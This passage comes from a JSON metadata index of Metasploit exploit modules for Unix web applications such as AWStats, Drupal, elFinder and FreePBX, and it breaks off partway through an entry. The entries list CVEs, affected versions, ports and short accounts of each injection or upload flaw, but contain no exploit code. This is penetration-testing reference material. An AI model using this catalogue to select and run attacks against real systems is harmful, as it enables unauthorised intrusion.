"exploit_unix/webapp/awstats_migrate_exec": {
"name": "AWStats migrate Remote Command Execution",
"full_name": "exploit/unix/webapp/awstats_migrate_exec",
"rank": 600,
"disclosure_date": "2006-05-04",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based\n payloads are recommended with this module. The vulnerability is only\n present when AllowToUpdateStatsFromBrowser is enabled in the AWStats\n configuration file (non-default).",
"references": [
"CVE-2006-2237",
"OSVDB-25284",
"BID-17844",
"URL-http://awstats.sourceforge.net/awstats_security_news.php",
"EDB-1755"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/awstats_migrate_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/awstats_migrate_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/awstatstotals_multisort": {
"name": "AWStats Totals multisort Remote Command Execution",
"full_name": "exploit/unix/webapp/awstatstotals_multisort",
"rank": 600,
"disclosure_date": "2008-08-26",
"type": "exploit",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n AWStats Totals PHP script. AWStats Totals versions v1.0 - v1.14 are vulnerable.",
"references": [
"CVE-2008-3922",
"OSVDB-47807",
"BID-30856"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/awstatstotals_multisort.rb",
"is_install_path": true,
"ref_name": "unix/webapp/awstatstotals_multisort",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/barracuda_img_exec": {
"name": "Barracuda IMG.PL Remote Command Execution",
"full_name": "exploit/unix/webapp/barracuda_img_exec",
"rank": 600,
"disclosure_date": "2005-09-01",
"type": "exploit",
"author": [
"Nicolas Gregoire <ngregoire@exaprobe.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n Barracuda Spam Firewall appliance. Versions prior to 3.1.18 are vulnerable.",
"references": [
"CVE-2005-2847",
"OSVDB-19279",
"BID-14712",
"URL-http://www.nessus.org/plugins/index.php?view=single&id=19556"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/unix/webapp/barracuda_img_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/barracuda_img_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/base_qry_common": {
"name": "BASE base_qry_common Remote File Include",
"full_name": "exploit/unix/webapp/base_qry_common",
"rank": 600,
"disclosure_date": "2008-06-14",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a remote file inclusion vulnerability in\n the base_qry_common.php file in BASE 1.2.4 and earlier.",
"references": [
"CVE-2006-2685",
"OSVDB-49366",
"BID-18298"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/base_qry_common.rb",
"is_install_path": true,
"ref_name": "unix/webapp/base_qry_common",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/basilic_diff_exec": {
"name": "Basilic 1.5.14 diff.php Arbitrary Command Execution",
"full_name": "exploit/unix/webapp/basilic_diff_exec",
"rank": 600,
"disclosure_date": "2012-06-28",
"type": "exploit",
"author": [
"lcashdollar",
"sinn3r <sinn3r@metasploit.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a metacharacter injection vulnerability in the\n diff.php script. This flaw allows an unauthenticated attacker to execute arbitrary\n commands as the www-data user account.",
"references": [
"CVE-2012-3399",
"OSVDB-83719",
"BID-54234"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2018-07-08 18:46:04 +0000",
"path": "/modules/exploits/unix/webapp/basilic_diff_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/basilic_diff_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/cacti_graphimage_exec": {
"name": "Cacti graph_view.php Remote Command Execution",
"full_name": "exploit/unix/webapp/cacti_graphimage_exec",
"rank": 600,
"disclosure_date": "2005-01-15",
"type": "exploit",
"author": [
"David Maciejak <david.maciejak@kyxar.fr>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n Raxnet Cacti 'graph_view.php' script. All versions of Raxnet Cacti prior to\n 0.8.6-d are vulnerable.",
"references": [
"OSVDB-17539",
"BID-14042"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/cacti_graphimage_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/cacti_graphimage_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/cakephp_cache_corruption": {
"name": "CakePHP Cache Corruption Code Execution",
"full_name": "exploit/unix/webapp/cakephp_cache_corruption",
"rank": 600,
"disclosure_date": "2010-11-15",
"type": "exploit",
"author": [
"tdz",
"Felix Wilhelm"
],
"description": "CakePHP is a popular PHP framework for building web applications. The\n Security component of CakePHP versions 1.3.5 and earlier and 1.2.8 and\n earlier is vulnerable to an unserialize attack which could be abused to\n allow unauthenticated attackers to execute arbitrary code with the\n permissions of the webserver.",
"references": [
"OSVDB-69352",
"CVE-2010-4335",
"BID-44852",
"PACKETSTORM-95847"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/cakephp_cache_corruption.rb",
"is_install_path": true,
"ref_name": "unix/webapp/cakephp_cache_corruption",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/carberp_backdoor_exec": {
"name": "Carberp Web Panel C2 Backdoor Remote PHP Code Execution",
"full_name": "exploit/unix/webapp/carberp_backdoor_exec",
"rank": 500,
"disclosure_date": "2013-06-28",
"type": "exploit",
"author": [
"bwall(Brian Wallace) <bwallace@cylance.com>",
"connection(Luis Santana) <hacktalkblog@gmail.com>",
"Steven K <xylitol@malwareint[d0t]com>"
],
"description": "This module exploits backdoors that can be found all over the leaked\n source code of the Carberp botnet C2 Web Panel.",
"references": [
"URL-http://www.xylibox.com/2013/06/carberp-remote-code-execution-carpwned.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"carberp"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/carberp_backdoor_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/carberp_backdoor_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/citrix_access_gateway_exec": {
"name": "Citrix Access Gateway Command Execution",
"full_name": "exploit/unix/webapp/citrix_access_gateway_exec",
"rank": 600,
"disclosure_date": "2010-12-21",
"type": "exploit",
"author": [
"George D. Gal",
"Erwin Paternotte"
],
"description": "The Citrix Access Gateway provides support for multiple authentication types.\n When utilizing the external legacy NTLM authentication module known as\n ntlm_authenticator the Access Gateway spawns the Samba 'samedit' command\n line utility to verify a user's identity and password. By embedding shell\n metacharacters in the web authentication form it is possible to execute\n arbitrary commands on the Access Gateway.",
"references": [
"CVE-2010-4566",
"OSVDB-70099",
"BID-45402",
"URL-http://www.vsecurity.com/resources/advisory/20101221-1/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/citrix_access_gateway_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/citrix_access_gateway_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/clipbucket_upload_exec": {
"name": "ClipBucket Remote Code Execution",
"full_name": "exploit/unix/webapp/clipbucket_upload_exec",
"rank": 600,
"disclosure_date": "2013-10-04",
"type": "exploit",
"author": [
"Gabby",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in ClipBucket version 2.6 and lower.\n The script \"/admin_area/charts/ofc-library/ofc_upload_image.php\" can be used to\n upload arbitrary code without any authentication. This module has been tested\n on version 2.6 on CentOS 5.9 32-bit.",
"references": [
"PACKETSTORM-123480"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Clipbucket 2.6"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/clipbucket_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/clipbucket_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/coppermine_piceditor": {
"name": "Coppermine Photo Gallery picEditor.php Command Execution",
"full_name": "exploit/unix/webapp/coppermine_piceditor",
"rank": 600,
"disclosure_date": "2008-01-30",
"type": "exploit",
"author": [
"Janek Vind",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the picEditor.php script of\n Coppermine Photo Gallery versions 1.4.14 and earlier. When configured to\n use the ImageMagick library, the 'quality', 'angle', and 'clipval'\n parameters are not properly escaped before being passed to the PHP\n 'exec' command.\n\n In order to reach the vulnerable 'exec' call, the input must pass\n several validation steps.\n\n The vulnerabilities actually reside in the following functions:\n\n image_processor.php: rotate_image(...)\n include/imageObjectIM.class.php: imageObject::cropImage(...)\n include/imageObjectIM.class.php: imageObject::rotateImage(...)\n include/imageObjectIM.class.php: imageObject::resizeImage(...)\n include/picmgmt.inc.php: resize_image(...)\n\n NOTE: Use of the ImageMagick library is a non-default option. However, a\n user can specify its use at installation time.",
"references": [
"CVE-2008-0506",
"OSVDB-41676",
"EDB-5019",
"URL-http://forum.coppermine-gallery.net/index.php?topic=50103.0"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/coppermine_piceditor.rb",
"is_install_path": true,
"ref_name": "unix/webapp/coppermine_piceditor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/datalife_preview_exec": {
"name": "DataLife Engine preview.php PHP Code Injection",
"full_name": "exploit/unix/webapp/datalife_preview_exec",
"rank": 600,
"disclosure_date": "2013-01-28",
"type": "exploit",
"author": [
"EgiX",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a PHP code injection vulnerability in DataLife Engine 9.7.\n The vulnerability exists in preview.php, due to an insecure usage of preg_replace()\n with the e modifier, which allows injection of arbitrary PHP code when there is a\n template installed which contains a [catlist] or [not-catlist] tag, even when the\n template isn't currently in use. The template can be configured with the TEMPLATE\n datastore option.",
"references": [
"CVE-2013-1412",
"OSVDB-89662",
"EDB-24438",
"BID-57603",
"URL-http://karmainsecurity.com/KIS-2013-01",
"URL-http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"DataLife Engine 9.7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/datalife_preview_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/datalife_preview_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/dogfood_spell_exec": {
"name": "Dogfood CRM spell.php Remote Command Execution",
"full_name": "exploit/unix/webapp/dogfood_spell_exec",
"rank": 600,
"disclosure_date": "2009-03-03",
"type": "exploit",
"author": [
"LSO <lso@hushmail.com>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module exploits a previously unpublished vulnerability in the\n Dogfood CRM mail function which is vulnerable to command injection\n in the spell check feature. Because of character restrictions, this\n exploit works best with the double-reverse telnet payload. This\n vulnerability was discovered by LSO and affects v2.0.10.",
"references": [
"OSVDB-54707",
"URL-http://downloads.sourceforge.net/dogfood/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/exploits/unix/webapp/dogfood_spell_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/dogfood_spell_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/drupal_coder_exec": {
"name": "Drupal CODER Module Remote Command Execution",
"full_name": "exploit/unix/webapp/drupal_coder_exec",
"rank": 600,
"disclosure_date": "2016-07-13",
"type": "exploit",
"author": [
"Nicky Bloor <nick@nickbloor.co.uk>",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a Remote Command Execution vulnerability in the\n Drupal CODER Module. Unauthenticated users can execute arbitrary\n commands under the context of the web server user.\n\n The CODER module doesn't sufficiently validate user inputs in a script\n file that has the PHP extension. A malicious unauthenticated user can\n make requests directly to this file to execute arbitrary commands.\n The module does not need to be enabled for this to be exploited.\n\n This module was tested against CODER 2.5 with Drupal 7.5 installed on\n Ubuntu Server.",
"references": [
"URL-https://www.drupal.org/node/2765575"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/drupal_coder_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/drupal_coder_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/drupal_drupalgeddon2": {
"name": "Drupal Drupalgeddon 2 Forms API Property Injection",
"full_name": "exploit/unix/webapp/drupal_drupalgeddon2",
"rank": 600,
"disclosure_date": "2018-03-28",
"type": "exploit",
"author": [
"Jasper Mattsson",
"a2u",
"Nixawk",
"FireFart",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a Drupal property injection in the Forms API.\n\n Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable.",
"references": [
"CVE-2018-7600",
"URL-https://www.drupal.org/sa-core-2018-002",
"URL-https://greysec.net/showthread.php?tid=2912",
"URL-https://research.checkpoint.com/uncovering-drupalgeddon-2/",
"URL-https://github.com/a2u/CVE-2018-7600",
"URL-https://github.com/nixawk/labs/issues/19",
"URL-https://github.com/FireFart/CVE-2018-7600"
],
"platform": "Linux,PHP,Unix",
"arch": "php, cmd, x86, x64",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic (PHP In-Memory)",
"Automatic (PHP Dropper)",
"Automatic (Unix In-Memory)",
"Automatic (Linux Dropper)",
"Drupal 7.x (PHP In-Memory)",
"Drupal 7.x (PHP Dropper)",
"Drupal 7.x (Unix In-Memory)",
"Drupal 7.x (Linux Dropper)",
"Drupal 8.x (PHP In-Memory)",
"Drupal 8.x (PHP Dropper)",
"Drupal 8.x (Unix In-Memory)",
"Drupal 8.x (Linux Dropper)"
],
"mod_time": "2019-03-05 18:58:11 +0000",
"path": "/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb",
"is_install_path": true,
"ref_name": "unix/webapp/drupal_drupalgeddon2",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"SA-CORE-2018-002",
"Drupalgeddon 2"
]
}
},
"exploit_unix/webapp/drupal_restws_exec": {
"name": "Drupal RESTWS Module Remote PHP Code Execution",
"full_name": "exploit/unix/webapp/drupal_restws_exec",
"rank": 600,
"disclosure_date": "2016-07-13",
"type": "exploit",
"author": [
"Devin Zuczek",
"Mehmet Ince <mehmet@mehmetince.net>"
],
"description": "This module exploits a Remote PHP Code Execution vulnerability in the\n Drupal RESTWS Module. Unauthenticated users can execute arbitrary code\n under the context of the web server user.\n\n RESTWS alters the default page callbacks for entities to provide\n additional functionality. A vulnerability in this approach allows\n an unauthenticated attacker to send specially crafted requests resulting\n in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7\n are affected by this issue.\n\n This module was tested against RESTWS 2.5 with Drupal 7.5 installed on\n Ubuntu Server.",
"references": [
"URL-https://www.drupal.org/node/2765567"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/drupal_restws_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/drupal_restws_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/drupal_restws_unserialize": {
"name": "Drupal RESTful Web Services unserialize() RCE",
"full_name": "exploit/unix/webapp/drupal_restws_unserialize",
"rank": 300,
"disclosure_date": "2019-02-20",
"type": "exploit",
"author": [
"Jasper Mattsson",
"Charles Fol",
"Rotem Reiss",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits a PHP unserialize() vulnerability in Drupal RESTful\n Web Services by sending a crafted request to the /node REST endpoint.\n\n As per SA-CORE-2019-003, the initial remediation was to disable POST,\n PATCH, and PUT, but Ambionics discovered that GET was also vulnerable\n (albeit cached). Cached nodes can be exploited only once.\n\n Drupal updated SA-CORE-2019-003 with PSA-2019-02-22 to notify users of\n this alternate vector.\n\n Drupal < 8.5.11 and < 8.6.10 are vulnerable.",
"references": [
"CVE-2019-6340",
"URL-https://www.drupal.org/sa-core-2019-003",
"URL-https://www.drupal.org/psa-2019-02-22",
"URL-https://www.ambionics.io/blog/drupal8-rce",
"URL-https://github.com/ambionics/phpggc",
"URL-https://twitter.com/jcran/status/1099206271901798400"
],
"platform": "PHP,Unix",
"arch": "php, cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"PHP In-Memory",
"Unix In-Memory"
],
"mod_time": "2019-04-24 11:41:30 +0000",
"path": "/modules/exploits/unix/webapp/drupal_restws_unserialize.rb",
"is_install_path": true,
"ref_name": "unix/webapp/drupal_restws_unserialize",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
"AKA": [
"SA-CORE-2019-003"
],
"Stability": [
"crash-safe"
],
"SideEffects": [
"ioc-in-logs"
],
"Reliability": [
"unreliable-session"
]
}
},
"exploit_unix/webapp/egallery_upload_exec": {
"name": "EGallery PHP File Upload Vulnerability",
"full_name": "exploit/unix/webapp/egallery_upload_exec",
"rank": 600,
"disclosure_date": "2012-07-08",
"type": "exploit",
"author": [
"Sammy FORGIT",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability found in EGallery 1.2. By abusing the\n uploadify.php file, a malicious user can upload a file to the egallery/ directory\n without any authentication, which results in arbitrary code execution. The module\n has been tested successfully on Ubuntu 10.04.",
"references": [
"OSVDB-83891",
"BID-54464",
"URL-http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"EGallery 1.2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/egallery_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/egallery_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/elfinder_php_connector_exiftran_cmd_injection": {
"name": "elFinder PHP Connector exiftran Command Injection",
"full_name": "exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection",
"rank": 600,
"disclosure_date": "2019-02-26",
"type": "exploit",
"author": [
"Thomas Chauchefoin",
"q3rv0",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a command injection vulnerability in elFinder\n versions prior to 2.1.48.\n\n The PHP connector component allows unauthenticated users to upload\n files and perform file modification operations, such as resizing and\n rotation of an image. The file name of uploaded files is not validated,\n allowing shell metacharacters.\n\n When performing image operations on JPEG files, the filename is passed\n to the `exiftran` utility without appropriate sanitization, causing\n shell commands in the file name to be executed, resulting in remote\n command injection as the web server user.\n\n The PHP connector is not enabled by default.\n\n The system must have `exiftran` installed and in `$PATH`.\n\n This module has been tested successfully on elFinder versions 2.1.47,\n 2.1.20 and 2.1.16 on Ubuntu.",
"references": [
"CVE-2019-9194",
"EDB-46481",
"URL-https://github.com/Studio-42/elFinder/releases/tag/2.1.48",
"URL-https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Auto"
],
"mod_time": "2019-03-09 04:41:51 +0000",
"path": "/modules/exploits/unix/webapp/elfinder_php_connector_exiftran_cmd_injection.rb",
"is_install_path": true,
"ref_name": "unix/webapp/elfinder_php_connector_exiftran_cmd_injection",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/flashchat_upload_exec": {
"name": "FlashChat Arbitrary File Upload",
"full_name": "exploit/unix/webapp/flashchat_upload_exec",
"rank": 600,
"disclosure_date": "2013-10-04",
"type": "exploit",
"author": [
"x-hayben21",
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a file upload vulnerability found in FlashChat\n versions 6.0.2 and 6.0.4 to 6.0.8. Attackers can abuse the upload\n feature in order to upload malicious PHP files without authentication\n which results in arbitrary remote code execution as the web server user.",
"references": [
"OSVDB-98233",
"EDB-28709"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/unix/webapp/flashchat_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/flashchat_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/foswiki_maketext": {
"name": "Foswiki MAKETEXT Remote Command Execution",
"full_name": "exploit/unix/webapp/foswiki_maketext",
"rank": 600,
"disclosure_date": "2012-12-03",
"type": "exploit",
"author": [
"Brian Carlson",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using\n a specially crafted MAKETEXT, a malicious user can execute shell commands since the\n input is passed to the Perl \"eval\" command without first being sanitized. The\n problem is caused by an underlying security issue in the CPAN:Locale::Maketext\n module. Only Foswiki sites that have user interface localization enabled\n (UserInterfaceInternationalisation variable set) are vulnerable.\n\n If USERNAME and PASSWORD aren't provided, anonymous access will be tried.\n Also, if the FoswikiPage option isn't provided, the module will try to create a\n random page on the SandBox space. The module has been tested successfully on\n Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.",
"references": [
"CVE-2012-6329",
"OSVDB-88410",
"URL-http://foswiki.org/Support/SecurityAlert-CVE-2012-6330"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Foswiki 1.1.5"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/unix/webapp/foswiki_maketext.rb",
"is_install_path": true,
"ref_name": "unix/webapp/foswiki_maketext",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_unix/webapp/freepbx_config_exec": {
"name": "FreePBX config.php Remote Code Execution",
"full_name": "exploit/unix/webapp/freepbx_config_exec",
"rank": 600,
"disclosure_date": "2014-03-21",
"type": "exploit",
"author": [
"i-Hmx",
"0x00string",
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.\n It's possible to inject arbitrary PHP functions and commands in the \"/admin/config.php\"\n parameters \"function\" and \"args\".",
"references": [
"CVE-2014-1903",
"OSVDB-103240",
"EDB-32214",
"URL-http://issues.freepbx.org/browse/FREEPBX-7123"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"FreePBX"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/freepbx_config_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/freepbx_config_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/generic_exec": {
"name": "Generic Web Application Unix Command Execution",
"full_name": "exploit/unix/webapp/generic_exec",
"rank": 600,
"disclosure_date": "1993-11-14",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module can be used to exploit any generic command execution vulnerability\n for CGI applications on Unix-like platforms. To use this module, specify the\n CMDURI path, replacing the command itself with XXcmdXX. This module is currently\n limited to forms vulnerable through GET requests with query parameters.",
"references": [
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/generic_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/generic_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/get_simple_cms_upload_exec": {
"name": "GetSimpleCMS PHP File Upload Vulnerability",
"full_name": "exploit/unix/webapp/get_simple_cms_upload_exec",
"rank": 600,
"disclosure_date": "2014-01-04",
"type": "exploit",
"author": [
"Ahmed Elhady Mohamed"
],
"description": "This module exploits a file upload vulnerability in GetSimple CMS. By abusing the\n upload.php file, a malicious authenticated user can upload an arbitrary file,\n including PHP code, which results in arbitrary code execution.",
"references": [
"EDB-25405",
"OSVDB-93034"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb",
"is_install_path": true,
"ref_name": "unix/webapp/get_simple_cms_upload_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_unix/webapp/google_proxystylesheet_exec": {
"name": "Google Appliance ProxyStyleSheet Command Execution",
"full_name": "exploit/unix/webapp/google_proxystylesheet_exec",
"rank": 600,
"disclosure_date": "2005-08-16",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a feature in the Saxon XSLT parser used by\n the Google Search Appliance. This feature allows for arbitrary\n java methods to be called. Google released a patch and advisory to\n their client base in August of 2005 (GA-2005-08-m). The target appliance\n must be able to connect back to your machine for this exploit to work.",
"references": [
"CVE-2005-3757",
"OSVDB-20981",
"BID-15509"
],
"platform": "Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
